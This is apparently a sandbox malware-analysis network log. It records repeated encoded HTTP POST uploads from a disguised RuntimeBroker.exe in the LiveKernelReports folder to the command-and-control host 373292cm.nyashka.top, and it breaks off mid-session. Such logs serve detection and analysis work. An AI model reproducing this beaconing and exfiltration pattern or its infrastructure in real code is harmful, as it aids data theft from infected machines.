                                                                                  Data Raw: 09 1d 26 54 29 1c 2a 5c 27 2b 28 52 30 30 2d 0e 2a 3d 20 07 2b 3d 25 5c 27 16 3e 06 32 3e 0d 0f 33 02 3e 03 29 3d 29 0f 25 3f 2f 13 3a 34 2b 5d 0c 13 21 06 21 2a 04 13 26 3c 28 11 3e 06 2b 17 36 02 36 5c 3c 39 2e 0c 3f 01 02 1d 3c 17 3b 11 28 04 0f 0b 38 06 35 16 39 30 25 0c 23 04 2b 52 0d 11 27 0a 3c 2d 29 1e 2a 3e 3b 15 21 28 30 02 24 2e 2e 50 24 31 3e 10 26 29 3b 05 26 21 36 08 25 21 39 1d 32 5d 3d 00 27 2c 22 0d 23 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &T)*\'+(R00-*= +=%\'>2>3>)=)%?/:4+]!!*&<(>+66\<9.?<;(8590%#+R'<-)*>;!(0$..P$1>&);&!6%!92]=',"#2#T,"W3UV
                                                                                  Jan 11, 2025 06:43:16.524147034 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:16.713952065 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:16.714138985 CET1872OUTData Raw: 5f 51 5c 52 51 40 51 5c 5b 5f 5a 51 59 52 58 52 57 5a 5d 5b 57 5b 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _Q\RQ@Q\[_ZQYRXRWZ][W[SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/# 5>$Y 1[=/<%_(.;Y"/?!"?+*;_#/>&F$.Y/1
                                                                                  Jan 11, 2025 06:43:17.269032001 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 11 28 36 2a 58 26 02 3b 0b 30 23 00 1d 3e 3d 0d 59 2a 03 07 5c 33 16 0b 15 31 00 30 55 26 3b 31 5b 3c 2e 2e 1a 31 2f 2c 00 39 0e 2b 5d 0c 13 22 5f 37 14 07 04 31 3c 06 13 29 2b 37 5a 20 3f 3e 5c 3c 39 2d 1b 28 3f 20 58 3c 39 2b 59 3f 29 2d 0c 2f 38 3d 18 2e 0e 39 0e 20 3e 2b 52 0d 11 24 10 28 3d 32 0a 3e 00 3c 00 35 06 24 01 27 2d 22 51 31 0c 08 54 27 07 30 5a 25 0b 21 50 24 57 39 50 32 3b 2e 1c 32 3c 3d 51 35 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &(6*X&;0#>=Y*\310U&;1[<..1/,9+]"_71<)+7Z ?>\<9-(? X<9+Y?)-/8=.9 >+R$(=2><5$'-"Q1T'0Z%!P$W9P2;.2<=Q5"#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.65691537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:16.191663027 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:16.537700891 CET2544OUTData Raw: 5f 51 59 53 54 46 54 5f 5b 5f 5a 51 59 54 58 5f 57 50 5d 5a 57 50 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _QYSTFT_[_ZQYTX_WP]ZWPS[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\,#?"=4Y40*>,<X)?,4?(41Q+:4#0>..&F$.Y/)
                                                                                  Jan 11, 2025 06:43:16.822776079 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:16.951612949 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.65692137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:17.738461971 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:18.082683086 CET2544OUTData Raw: 5f 52 5c 51 54 43 51 5c 5b 5f 5a 51 59 55 58 52 57 50 5d 5d 57 58 53 5d 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _R\QTCQ\[_ZQYUXRWP]]WXS]\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-80$6- ^" %Z+=<=![+.;4</P 8P?:?Y73=X/&F$.Y/-
                                                                                  Jan 11, 2025 06:43:18.371696949 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:18.502990007 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.65692637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:18.776649952 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:19.218698978 CET2544OUTData Raw: 5f 54 5c 53 51 42 51 5a 5b 5f 5a 51 59 5e 58 5e 57 59 5d 5e 57 5b 53 5d 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _T\SQBQZ[_ZQY^X^WY]^W[S]\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-, /E#=0\"0&+= _>=>+>< ,S7;<943"8&F$.Y/
                                                                                  Jan 11, 2025 06:43:19.413922071 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:19.584779024 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.65693437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:19.892827988 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:20.242187977 CET2544OUTData Raw: 5f 5c 5c 54 51 45 51 5c 5b 5f 5a 51 59 50 58 53 57 5d 5d 5a 57 5a 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\\TQEQ\[_ZQYPXSW]]ZWZS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;36=_#>=3(&+[?\ ,#$S+4^,&F$.Y/
                                                                                  Jan 11, 2025 06:43:20.520787001 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:20.650435925 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.65694137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:21.204328060 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:21.551412106 CET2544OUTData Raw: 5f 54 59 53 54 40 54 5b 5b 5f 5a 51 59 54 58 53 57 58 5d 58 57 5c 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYST@T[[_ZQYTXSWX]XW\SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-8,#-;439\>='?-5(]4 42<( 3>,&F$.Y/)
                                                                                  Jan 11, 2025 06:43:21.848150015 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:22.021879911 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.65694737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:22.215986967 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:22.567076921 CET2544OUTData Raw: 5a 51 5c 5e 51 47 54 5b 5b 5f 5a 51 59 50 58 53 57 5d 5d 5b 57 5f 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\^QGT[[_ZQYPXSW]][W_SX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.;33".? #%*[ (>_<.7[7P 2$+)#%;>&F$.Y/
                                                                                  Jan 11, 2025 06:43:22.848571062 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:22.983200073 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.65694837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:22.354626894 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:22.707684040 CET1852OUTData Raw: 5a 57 5c 55 54 46 51 59 5b 5f 5a 51 59 51 58 5f 57 50 5d 5e 57 59 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZW\UTFQY[_ZQYQX_WP]^WYST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/ ?B5>;7+-(_?)_+#4!$S(9X436/&F$.Y/=
                                                                                  Jan 11, 2025 06:43:23.007421017 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:23.139133930 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 1e 2a 0b 00 1f 25 05 20 1b 24 33 31 0b 29 2d 20 01 2a 2e 36 01 30 38 3a 00 26 2d 30 51 30 15 29 1f 2b 3e 04 1a 25 2f 27 13 2e 34 2b 5d 0c 13 22 5c 37 5c 29 05 26 3f 34 11 3d 5e 2b 17 35 2c 29 01 2b 39 36 0c 3c 2f 28 5f 3e 39 09 5d 2b 2a 3e 55 2c 16 29 5d 39 33 2e 55 37 3e 2b 52 0d 11 27 0e 3c 03 25 54 3e 10 23 5d 21 38 23 59 26 3d 00 56 24 21 39 0d 30 00 24 5a 31 0c 29 1c 33 08 3e 08 26 38 32 5a 27 2c 3a 0c 23 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &*% $31)- *.608:&-0Q0)+>%/'.4+]"\7\)&?4=^+5,)+96</(_>9]+*>U,)]93.U7>+R'<%T>#]!8#Y&=V$!90$Z1)3>&82Z',:#2#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.65695437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:24.129266977 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:24.473403931 CET2544OUTData Raw: 5f 54 5c 56 54 44 51 5c 5b 5f 5a 51 59 50 58 55 57 51 5d 5d 57 50 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _T\VTDQ\[_ZQYPXUWQ]]WPS[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./#"[7" &)-^?&)=74?4 18Q*9;X" X,.&F$.Y/
                                                                                  Jan 11, 2025 06:43:24.797979116 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:24.930340052 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.65696137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:25.440104008 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:25.785851955 CET2536OUTData Raw: 5f 50 5c 5f 51 42 54 5e 5b 5f 5a 51 59 57 58 51 57 50 5d 59 57 58 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _P\_QBT^[_ZQYWXQWP]YWXS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.]80"=770*-$(X9(>8"<W7(Q+:4"#5/&F$.Y/=
                                                                                  Jan 11, 2025 06:43:26.066072941 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:26.193763971 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.65697337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:28.169143915 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:28.525475979 CET1872OUTData Raw: 5a 56 5c 51 54 49 51 5b 5b 5f 5a 51 59 5e 58 52 57 5e 5d 5e 57 5e 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZV\QTIQ[[_ZQY^XRW^]^W^SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.,#".+ &==<\<.(4",'S4!3?<46.>&F$.Y/
                                                                                  Jan 11, 2025 06:43:28.891774893 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:29.039328098 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0f 29 26 22 5a 31 15 2c 50 24 0d 32 57 29 2d 3b 13 2a 5b 3a 00 27 16 0b 59 26 58 2c 1d 27 15 0f 11 28 10 0f 09 24 2f 3b 58 3a 34 2b 5d 0c 13 21 01 37 5c 35 02 26 02 2c 5d 3e 01 2c 05 22 3c 04 59 3c 3a 21 50 3c 06 3b 03 28 39 09 1e 3c 04 26 1f 38 06 2d 5b 3a 33 32 51 34 04 2b 52 0d 11 27 0e 29 3e 25 53 3d 2d 3f 5e 21 28 3b 5f 33 2d 3d 0f 26 21 22 56 26 3a 24 11 32 31 2a 0d 25 22 36 0c 32 38 29 06 32 3f 2e 0f 22 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %)&"Z1,P$2W)-;*[:'Y&X,'($/;X:4+]!7\5&,]>,"<Y<:!P<;(9<&8-[:32Q4+R')>%S=-?^!(;_3-=&!"V&:$21*%"628)2?."2#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.65697537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:28.911962032 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:29.270168066 CET2544OUTData Raw: 5a 57 5c 55 54 40 51 5e 5b 5f 5a 51 59 53 58 5f 57 5e 5d 52 57 51 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZW\UT@Q^[_ZQYSX_W^]RWQS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._;3#=3# %X>+.:)>7#, 2??)7 !]/&F$.Y/5
                                                                                  Jan 11, 2025 06:43:29.602412939 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:29.732094049 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:29 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.65698237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:30.147370100 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:30.645123959 CET2544OUTData Raw: 5f 56 5c 57 54 45 54 5e 5b 5f 5a 51 59 53 58 5f 57 5e 5d 58 57 5f 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
